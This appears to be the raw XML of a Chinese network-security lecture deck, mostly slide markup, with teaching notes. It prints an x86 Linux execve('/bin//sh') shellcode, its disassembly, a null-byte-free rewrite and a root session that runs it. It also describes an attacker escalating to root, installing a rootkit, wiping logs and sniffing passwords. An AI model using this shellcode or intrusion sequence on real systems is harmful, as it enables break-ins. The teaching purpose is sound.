                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482fa:       83 e4 f0                and    $0xfffffff0,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482fd:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048302:       29 c4                   sub    %eax,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048304:       ba 00 00 00 00          mov    $0x0,%edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048309:       52                      push   %edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804830a:       68 6e 2f 73 68          push   $0x68732f6e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804830f:       68 2f 2f 62 69          push   $0x69622f2f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048314:       89 e3                   mov    %esp,%ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048316:       52                      push   %edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048317:       53                      push   %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048318:       89 e1                   mov    %esp,%ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831a:       b8 0b 00 00 00          mov    $0xb,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831f:       cd 80                   int    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048321:       c9                      leave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048322:       c3                      ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048323:       90                      nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> [root@zhugejw shellcode]# gcc -o shellcode_asm_fix shellcode_asm_fix.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>shellcode_asm_fix.c:12:6: warning: multi-line string literals are deprecated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# ./shellcode_asm_fix</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# objdump -d shellcode_asm_fix | more</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>080482f4 &lt;main&gt;:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f4:       55                      push   %ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f5:       89 e5                   mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f7:       83 ec 08                sub    $0x8,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482fa:       83 e4 f0                and    $0xfffffff0,%esp //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>栈对齐</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>80482fd:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>  8048302:       29 c4                   sub    %eax,%esp //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>代码对齐？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>---------------------------------------------------------------------------shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048304:       31 d2                   xor    %edx,%edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048306:       52                      push   %edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048307:       68 6e 2f 73 68          push   $0x68732f6e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804830c:       68 2f 2f 62 69          push   $0x69622f2f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048311:       89 e3                   mov    %esp,%ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048313:       52                      push   %edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048314:       53                      push   %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048315:       89 e1                   mov    %esp,%ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048317:       8d 42 0b                lea    0xb(%edx),%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831a:       cd 80                   int    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> ----------------------------------------------------------------------------</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831c:       c9                      leave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831d:       c3                      ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>  804831e:       90                      nop	//</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831f:       90                      nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8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5D752A5-E0AF-4B90-8252-D219B0319A75}"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D5B2EEF-D9C4-4249-B595-8026139893B4}"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200707" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>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48E8D23-6BEC-40ED-BFDA-E80C44FF3A4B}"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solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11059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a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112644" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5652D7EB-781C-4D12-BC31-D7AFD72DD4DC}"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攻击者通过远程攻击获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>访问权限，或者首先密码猜测或者密码强制破译的方式获得系统的访问权限。进入系统后，如果他还没有获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>权限，再通过某些安全漏洞获得系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>权限。接着，攻击者会在侵入的主机中安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，然后他将经常通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的后门检查系统是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的嗅探器获得其它系统的用户和密码之后，攻击者就会利用这些信息侵入其它的系统。</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CFB8A69-4D75-4737-A248-69970563886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solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111620"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586EE449-10BC-4C95-9A4B-2B341D3592B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solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114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BA328FC-D9A5-4EE0-97B3-42E2457E0C5E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414722"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ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414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9629FB7-1E15-4852-97AF-312C7FEF727F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416770"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ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416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5E7F70-1CE2-407F-803E-7AF508D19FB0}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418818"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ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418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AEF52C4-9223-4230-BD9D-525A978CD42D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420866"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ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420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BFAC3EA-D520-4DDC-882F-ACF49CA4312E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1720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1720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4B6B766-DC2E-4E0B-B394-CC3585DCFE03}"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202755" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202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DFDFF0D-C498-45FB-BCCA-B0E10B2E2903}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117763" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177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anose="02020603050405020304"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D18BC3A-11C8-40E6-A23C-B0AE74F20C92}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118787" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187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anose="02020603050405020304"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ABA0CFA-AD09-4B71-8544-DDF4A5E00D85}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>一个最常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>协议就是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ping，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>它利用了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的回显请求和回显应答报文</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304"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8CCA7CC-7C60-4CAB-936B-D815994FC963}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120835" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120836"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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
